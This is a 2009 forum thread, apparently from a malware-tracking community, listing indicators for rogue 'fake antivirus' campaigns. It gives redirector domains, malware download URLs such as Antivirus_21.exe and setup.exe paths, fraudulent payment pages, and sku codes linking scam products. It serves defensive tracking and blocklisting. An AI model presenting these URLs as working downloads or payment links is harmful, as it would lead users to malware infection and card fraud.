quickhealcleaner.com
greenbillsystem.com (payment page)

fake alert (personal antivirus)

work with /download/Antivirus_21.exe

Code: [Select]
antivirusquickscan3.com
antivirusquickscan5.com
advancedpcscanner3.com
advancedvirscanner3.com
advancedpcscanner9.com
advancedpcscanner6.com
advancedpcscanner2.com
best-virus-scanner4.com
antivirusquickscan3.com
antivirusquickscan5.com
bestantivirusscanv8.com

AntivirusSystemPro:
Code: [Select]
awareremover.com
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 06, 2009, 09:02:59 pm
extremely low detection, VT 2/41 atm

Code: [Select]
antivirus-fast-scan04.com/download/Antivirus_21.exe
antivirus-fast-scan05.com/download/Antivirus_21.exe
antivirus-fast-scan02.com/download/Antivirus_21.exe
antivirus-fast-scan01.com/download/Antivirus_21.exe
http://www.virustotal.com/analisis/288bf2c3a9b50368420995c6260cec46014a2ba3501e12edbbb3e11eb5d9e4df-1252270831
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 06, 2009, 10:15:59 pm
all these sites got 1/40 or 2/40

Code: [Select]
antivirusquickscan2.com/download/Antivirus_21.exe

Wepawet (http://wepawet.iseclab.org/view.php?hash=cad4e778120becff8d691fdc321a59a8&t=1252275850&type=js)
VirusTotal (http://www.virustotal.com/analisis/8b1121fc5f8d483d096b141933e5062162d01068cdc7eba46609e509f212c165-1252262197) - 1/41 (2.44%)

http://www.malwareurl.com/search.php?s=fakexpa&rp=500&urls=on

The redirectors are:

Code: [Select]
mashroomtheory.cn/go.php?id=2004&key=ff0057594&p=1
space2009city.cn/go.php?id=2004&key=ff0057594&p=1
greattime2009.cn/go.php?id=2004&key=ff0057594&p=1
iwanttowin.cn/go.php?id=2004&key=ff0057594&p=1
hardnut.cn/go.php?id=2004&key=ff0057594&p=1
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 08, 2009, 05:44:20 am
Fake av: personal antivirus
Code: [Select]
fast-virus-scan9.com
fast-virus-scan7.com
fast-virus-scan2.com
superb-virus-scan03.com
reliable-scanner05.com
reliable-scanner06.com
reliable-scanner09.com

some redirects to rogue av: (all registered by spscript@hotmail.com)
Code: [Select]
nyhciud.cn/?uid=186&pid=3&ttl=5144e4b9545
zimujal.cn/?uid=186&pid=3&ttl=5144e4b9545
anoujek.cn/?uid=186&pid=3&ttl=5144e4b9545
capide.cn/?uid=186&pid=3&ttl=5144e4b9545
erufyid.cn/?uid=186&pid=3&ttl=5144e4b9545
oziyma.cn/?uid=186&pid=3&ttl=5144e4b9545
omeoqka.cn/?uid=186&pid=3&ttl=5144e4b9545
vijbyas.cn/?uid=186&pid=3&ttl=5144e4b9545
zymqadi.cn/?uid=186&pid=3&ttl=5144e4b9545
osujyre.cn/in.cgi?9&tsk=id897-12june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
iqipevo.cn/in.cgi?9&tsk=id308-01july09-r91&type=l&seoref=
uzehayb.cn/in.cgi?9&tsk=id894-09june09-r35&type=l&seoref=
susnoj.cn/in.cgi?9&tsk=id894-09june09-r35&type=l&seoref=
waztuok.cn/in.cgi?9&tsk=id908-15june09-r35&type=l&seoref=
ucuywih.cn/in.cgi?9&tsk=id900-13june09-r35&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
avagujy.cn/in.cgi?9&tsk=id900-13june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
cybipmo.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=�meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
aqobeyv.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ynyxeg.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
upiumry.cn/in.cgi?9&tsk=id897-12june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
oqaezfy.cn/in.cgi?9&tsk=id299-29june09-r91&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ediyhy.cn/in.cgi?9&tsk=id842-03may09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
lycurvo.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
gevyta.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
tudanyg.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ubaunki.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ugezuso.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ukodun.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
upeozab.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
sozefpa.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
uleyvom.cn/in.cgi?9&tsk=id925-30june09-r35&type=l&seoref=¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
isavifo.cn/in.cgi?9
itogym.cn/in.cgi?9
muvytas.cn/in.cgi?6
uhaulde.cn/in.cgi?6
sipyjo.cn/in.cgi?6
kukbize.cn/in.cgi?6

fakevimes:
Code: [Select]
safetysystem-protect.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
safetysystem-protect.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-checkvirus.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-checkvirus.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
safetysystem-guard.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
safetysystem-guard.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
systemscan-secure.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
systemscan-secure.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-virusscanner.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-virusscanner.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-scanvirus.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
go-scanvirus.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
windows-protectonline.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
windows-systemshield.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
windows-systemshield.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%

winwebsec:
Code: [Select]
thesecuritywinscan.com
safetyscantool.com

interetantiviruspro:
Code: [Select]
wzand.info/download/install.php
redirects to rogue av:
Code: [Select]
iliconsmoon.com/?uid=186&pid=3&ttl=5144e4b9545
lounge-officers.com/?pid=57&sid=cac46c
messengerinfo.cn/go.php?id=2004&key=ff0057594&p=1
leasom.com/?uid=186&pid=3&ttl=51840429734
news-feedster.com/?uid=186&pid=3&ttl=51840429734

total security:
Code: [Select]
85.17.145.123
traiden.org
verticalt.com
shontecltd.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 10, 2009, 09:27:36 am
trojan
Code: [Select]
cubeexe.com/av-scanner.0.exe
directs to trojan:
Code: [Select]
free-checkpc.com/l/dc912a2588i80u79xtrojan:
Code: [Select]
safe-fileshere.com/s/wf61d694792s74i71p/setup.exe
rogue av - fakeplus
Code: [Select]
avplus2010.com/redirect.php (redirects)
avplus2010.com/se.exe (trojan)
avplus2010.com/buy.php (fraudulent payment page)
avplus2010.com/install/InternetExplorer.dll (trojan)
avplus2010.com/install/avplus.exe (fake av)
avplus2010.com/install/AntivirusPlus.exe (fake av)
avplus2010.com/install/AntivirusPlus_ba.exe (fake av)
avplus2010.com/install/AntivirusPlus.grn (fake av config)
avplus2010.com/cb/real.php (phone back location)
avplus2010.com/cfg/dmns.cfg (returns list of related domains)

same as:
Code: [Select]
antivirplus2009.com
realbestantivirusplus.com
the pake payment page:
Code: [Select]
my-secure-payment.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert=
fakeplus loader:
Code: [Select]
inagyve.cn/installer_1.exe
hiqtacy.cn/installer_1.exe

internetantiviruspro:
Code: [Select]
benber.info/download/install.php
totalsecurity:
Code: [Select]
fuck-celebrities-movie.com/tube/softwarefortubeview.exe
securityscantoolguide.com/in.php(redirects)
securityscantoolguide.com/hitin.php (redirects)
securityscantoolguide.com/scan.php  (fake scan page)
securityscantoolguide.com/scanonline.php  (fake scan page)
securityscantoolguide.com/index.php (fake scan page)
securityscantoolguide.com/download.php (payload)
securityscantoolguide.com/install/ws.exe (payload)
securityscantoolguide.com/temp/links.txt (config for links)
securityscantoolguide.com/tempin/links.txt (config for links)

same as:
Code: [Select]
bestsecurityjobs.com
thesecuritywinscan.com

directs to fraudulent payment page:
Code: [Select]
demetraindustries.com/pay.php?id=
secure.personalpurchuasesite.com/buy.php?

redirects to fake av:
Code: [Select]
bestinvestmentssolution.com/?pid=99s01&sid=cd5681
spacestations-online.com/?pid=157s01&sid=0cda24
willsmithinc.cn/go.php?id=2020-01&key=f804e386a&p=1
batman-comics.cn/go.php?id=2019&key=572c78987&p=1
beststarwars.cn/go.php?id=2013-01&key=a98402e2d&p=1

fakevimes:
Code: [Select]
onlinesystemscan.net
online-systemscan.com
online-securescanner.com
online-scanandsecure.net
onlinescansystem.com
onlinescansystem.net
onlinesystemscan.com

working url:
/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW1iZZNsyWGaaWGYkYnZ0Zqop5uikomtpXFqZm1maWqZYZ2dV5OQcQ%
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 10, 2009, 05:58:29 pm
payment pages for rogue av:

https
Code: [Select]
absbillnow.com/payment/?sku_name=
secure.absbillnow.com/payment/?sku_name=
secure.billingsecurepayment.com/payment/?sku_name=QDM_EN

personal antivirus:
Code: [Select]
secure.onlinesoftwarebilling.com/billing/?
secure.onlinestoresystem.com/billing/?
secure.order-software-online.com/billing/?
secure.personalpurchuasesite.com/buy.php?
secure.smart-online-shop.com/billpav/?world&
smart-online-shop.com/download.php
smart-online-shop.com/buy.php
smart-online-shop.com/billing/
secure.worldsoftwarestore.com/download.php
secure.worldsoftwarestore.com/buy.php
secure.worldsoftwarestore.com/billing/
worldsoftwarestore.com/download.php
worldsoftwarestore.com/buy.php
worldsoftwarestore.com/billing/

http

Code: [Select]
billing365solution.com/payment/?sku_name=
secure.billing365solution.com/payment/?sku_name=
bill-solution-365.com/payment/?sku_name=PCANSP_EN
secure.bill-solution-365.com/payment/?sku_name=PCANSP_EN
ccpaymentsys24.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
cc-payment-sys24.com/payment/?sku_name=PCANSP_EN
cc-pay-system.com/payment/?sku_name=PCANSP_EN
pay-cc-24.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
pay-securesystem.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.basebilling.com/payment/?sku_name=
secure.bill-service-365.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
bill-service-365.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.bill-solution-365.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.billsystem-24.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,PCANSP_EN_01,ACTF_EN,EDS_EN_S&sku_checked=1&affid=-2421264686,1017,0,&nid=431ae3a42aa877d0d3ac816da0e4b772
secure.pay-cc-24.com/payment/?sku_name=PCANSP_EN
secure.paymentsolution24.com/payment/?sku_name=PCANSP_EN
secure.payment-solution24.com/payment/?sku_name=PCANSP_EN
paymentsolution24.com/payment/?sku_name=QDM_EN
secure.pay-securesystem.com/payment/?sku_name=PCANSP_EN

Code: [Select]
continental-systems.com/payment/?sku_name=PCANSP_EN
ecologygreenpc.com

WinAntivirusPro (Trojan FakeScanti)
Code: [Select]
212.116.123.4/signup.cgi
billmeplease.biz/signup.cgi
bill-it-now.com/signup.cgi
billmyccnow.com/signup.cgi
join2623.softwareordersx.com/signup.cgi
oftwareordersx.com/signup.cgi
ingloriousbastardsx.com/signup.cgi
core2623.ingloriousbastardsx.com/signup.cgi

total security:
Code: [Select]
onlinebillingsolution.net/buy.php
personal antivirus:
Code: [Select]
order-software-online.com
winbluesoft
Code: [Select]
billsoftpay.com/order_winbluesoft.php?order_id=8fe0553eeaf0d90230553f61192f4d8f&anticache=1249380139
paysoftbillsolution.com/order.php?order_id=f0b0fa8487746e8e3691cb6612f92afd&anticache=1251277348
safebillsolution.com/order.php?order_id=5024b39d3e7f2a1d8f0bb255332ecb1d&anticache=1248975552

personal defender:
Code: [Select]
personal08.com
pcfsupport.com

smart virus eliminator:
Code: [Select]
rss-checkfeeds.com/bill/?pc_id=&uid=&ls=&bid=&t=&pid=3&sid=&StrWinOS=&prID=3&abbr=SMVE
privacyguardpro:
Code: [Select]
secure.privacyguardpro.com/index.php?SECURITY_CODE=2155
malwares eradicator:
Code: [Select]
malwareseradicator.com
secure.softhotspot.com/cgi-bin/bill.cgi?id=148&type=cc
softhotspot.com/cgi-bin/bill.cgi?id=148&type=cc

antivirus agent pro:
Code: [Select]
secure.soft-process.com/?ID=6859
system security:
Code: [Select]
securesoftwarebill.com/out.php
securesoftwarebill.com/buy.php

other rogue:
Code: [Select]
secure.thepaymentonline.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=ap
rogue page transaction complete:
Code: [Select]
secure.softwaresecuredbilling.com/cgi-bin/nph-pr/pandora/cr/vrt4/check.php?trans_id=101049183&hash=350ad40b482c24dda1f7794506835452&problem=0
-----

for URLs with "/?sku_name=" below are the associated products:

QDM_EN QuickDownloadManager     
WSECST_EN Windows Security Suite
EGPC_EN_05 EcologyGreenPC
HMANT_EN Home Antivirus 2010
SFP_EN SafeFixerPro
PCANSP_EN PC Antispyware 2010
CNTRVR_EN ContraViro
MF_EN_S_03 MegaFixer
TRACER_EN_01 TraceEraser
LIFES_EN LifeEcoCenter
3P_SEC_EN_S_00 SecureExpertCleaner
QDM_EN QuickDownloadManager
EXTP_EN ExternalPlayer
NACL_EN NetActivityCleaner
ERV_EN  ErrorVanish
WNDOPT_EN Wind Optimizer
PCSEC_EN PC Security 2009
3DMLWDSTR_EN Malware Destructor 2009
MLWDSTR_EN_00 Malware Destructor 2009
MLWCT_EN Malwarecatcher
3DFAV2009_EN Fast Antivirus 2009
FAV2009_EN_00 Fast Antivirus 2009
AMS_EN_08 AntiMalwareSuite
CLN_EN_09 Cleaner2009
WSECST_EN Windows Security Suite
PRTU_EN Presto TuneUp
VRSLD_EN Virus Shield
PSB_EN MyBackupMaster
3B_WSP_EN_S WinSpywareProtect
WTBO_EN WTBOptimizer   

Code: [Select]
secure.pay-securesystem.com/payment/?sku_name=WSECST_EN
secure.pay-securesystem.com/payment/?sku_name=CLN_EN_09
secure.pay-securesystem.com/payment/?sku_name=PCANSP_EN
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 14, 2009, 10:48:00 am
This one needs to be monitored. I found 10 domains every day. (WindowsSecuritySuite / WindowsSystemSuite etc..)

Code: [Select]
my-systemscan.net
my-systemscan.com
my-systemscanner.com
my-systemscanner.net
my-saerchsecure.com
my-saerchsecure.net
my-newprotection.com
my-protectedsystem.com
my-protectedsystem.net
my-systemprotection.com
my-systemprotection.net
new-scanandprotect.net
new-scanandprotect.com
newscan-andprotect.com
newscan-andprotect.net
newscan-protect.com
newscan-protect.net
online-securescanner.net
onlinesecurescanner.net
onlinesecurescanner.com
onlinesystemscanner.com
onlinesystemscanner.net
search-scansystem.net
search-scansystem.com
searchscan-online.com
searchscan-online.net
searchscanonline.net
protectand-secure.net
protect-andsecure.net
protectand-secure.com
protect-andsecure.com

fake scan page at: /?p=WKmimHVlbXGHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW2OZWpsmGKWYGKWkonX15Krp6mikomtpXFqZm1mcHGWYJWbV5OQcQ%3D%3D
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 14, 2009, 10:51:54 am
just updated:
Code: [Select]
my-safetyprotection.com
my-safetyprotection.net
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 14, 2009, 11:01:19 am
redirects to rogue antivirus (fakeplus):

Code: [Select]
hiqtacy.cn
redirections since 48h
Code: [Select]
iniegox.cn
iniwuv.cn
inyelu.cn
inyxode.cn
ipaliky.cn
ipaugli.cn
ipemuw.cn
inagyve.cn
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 15, 2009, 12:41:47 pm
redirects to fake av
Code: [Select]
myth-busters.cn/go.php?id=2009-01&key=cd19f5036&p=1
Code: [Select]
09computerquickscan.com/1/?sess=%3DWG39jDwMy0xJmlwPTg0LjE3Ni42Ny4yNiZ0aW1lPTEyNTkwMEcMOQkM
http://09computerquickscan.com/download/Scanner-32ced_2009-1.exe

See also:

http://www.dynamoo.com/blog/2009/09/rogue-ads-on-answerscom-dotastoccom.html
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 17, 2009, 04:23:42 pm
Today I received an e-mail from someone who reported a redirection to

Code: [Select]
http://spywareshop.info/0/go.php?sid=2
when visiting his site coming from google or gmail.
Redirecting didn't occur when visiting the site directly.

I guessed that his site had been compromised and file  .htaccess had been modified.
And indeed - that was exactly what happened, probably caused by an outdated Joomla installation.
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 18, 2009, 04:55:59 am
fake systemsuite (fakevimes):
Code: [Select]
fast-systemguard.net
fastsystem-guard.com
trust-systemguard.com
trust-systemguard.net
trustsystem-guard.net
trustsystemguard.net
trustsystemguard.com
trustsystem-guard.com
secureandprotect.net
trust-systemprotect.com
trust-systemprotect.net
trust-systemprotection.com
trust-systemprotection.net
trustsystem-protection.com
trustsystem-protection.net
trustsystemprotect.com
trustsystemprotect.net
trustsystemprotection.net
my-protectedzone.net
my-protectedzone.com
myprotection-zone.net
myprotectionzone.com
protected-field.com

/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

same urls for:
Code: [Select]
yzoysun.cn
ynoubfa.cn
tilowgy.cn

related to:
Code: [Select]
windows-protectionsuite.com
windowsprotection-suite.net

fakeplus:
Code: [Select]
antivirus-plus09.com/redirect.php
antivirus-plus09.com/se.exe
antivirus-plus09.com/buy.php
antivirus-plus09.com/install/avplus.exe
antivirus-plus09.com/install/InternetExplorer.dll
antivirus-plus09.com/install/AntivirusPlus.exe
antivirus-plus09.com/install/AntivirusPlus.grn
antivirus-plus09.com/install/AntivirusPlus_ba.exe
antivirus-plus09.com/cb/real.php
antivirus-plus09.com/cfg/dmns.cfg

trojan fraudload:
Code: [Select]
download-secure-files.com/s/w28f0b86497x7ft74s/setup.exe
rogue system pro
Code: [Select]
antivirplatinum.com
intsecure-2009.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 19, 2009, 04:22:38 am
fake systemsuite - fakevimes
Code: [Select]
fastscanandprotect.com
fastscanandprotect.net
fastscan-protect.net
fastscan-protect.com
fast-scanandprotect.net
systemprotected.net
trustsystem-protect.net
payload: /build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

related:
Code: [Select]
windows-protectionsuite.net
update1.windows-protectionsuite.net
update2.windows-protectionsuite.net
pay1.windows-protectionsuite.net
pay2.windows-protectionsuite.net

personal antivirus:
Code: [Select]
windowsprotection-5.com
windowsprotection-9.com
windowsprotection-8.com
antispywaretotalscan0.com
6cleanspyware.com
payload:
/download/Soft_1.exe

They're a lot of new domains with TODAYNIC.COM - 2009-09-16

Code: [Select]
004all-scanner.com
006all-scanner.com
007all-scanner.com
009all-scanner.com
01malwarescan.com
01riskscanner.com
02riskscanner.com
03killspyware.com
04killspyware.com
06riskscanner.com
07malwarescan.com
08malwarescan.com
09killspyware.com
09riskscanner.com
1cleanspyware.com
1killspyware.com
3removespyware.com
4cleanspyware.com
4malwarescan.com
5removespyware.com
6cleanspyware.com
6malwarescan.com
7cleanspyware.com
7killspyware.com
7removespyware.com
8removespyware.com
9cleanspyware.com
9removespyware.com
computeron-linescan03.com
computeron-linescan04.com
computeron-linescan06.com
computeron-linescan07.com
computeron-linescan09.com
mycomputeronlinescan04.com
mycomputeronlinescan06.com
mycomputeronlinescan08.com
mycomputeronlinescan09.com
mycomputeronlinescan11.com
mycomputerscan11.com
mycomputerscan14.com
mycomputerscan16.com
mycomputerscan17.com
mycomputerscan19.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 19, 2009, 08:39:00 am
fakevimes:
Code: [Select]
fastscansecure.net
fast-searchandsecure.net
fast-searchandsecure.com
fastsearch-secure.com
fastsearch-secure.net
fast-searchandprotect.com
fast-searchandprotect.net
fastsearchandprotect.com
fastsystem-guard.net
fast-systemguard.com
payload:/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

directs to rogue av:
Code: [Select]
iuulnta.cn/bestway.js
iuzhejw.cn/bestway.js
jyvlayu.cn/bestway.js
lpreke.cn/bestway.js
litjnz.cn/bestway.js
tqeetazx.cn/bestway.js
weueai.cn/bestway.js
xouymiw.cn/bestway.js

interesting IP: 83.233.165.69
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=83.233.165.69&colsearch=All&ascordesc=DESC&quantity=100&page=0

Code: [Select]
aqobeyv.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
avagujy.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
cybipmo.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ediyhy.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
gevyta.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
melodystage.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
oqaezfy.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
osujyre.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
susnoj.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
sweetfay.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
tudanyg.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ubaunki.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ucuywih.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ugezuso.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
upiumry.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
uzehayb.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
waztuok.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
winnerphone.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ynyxeg.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
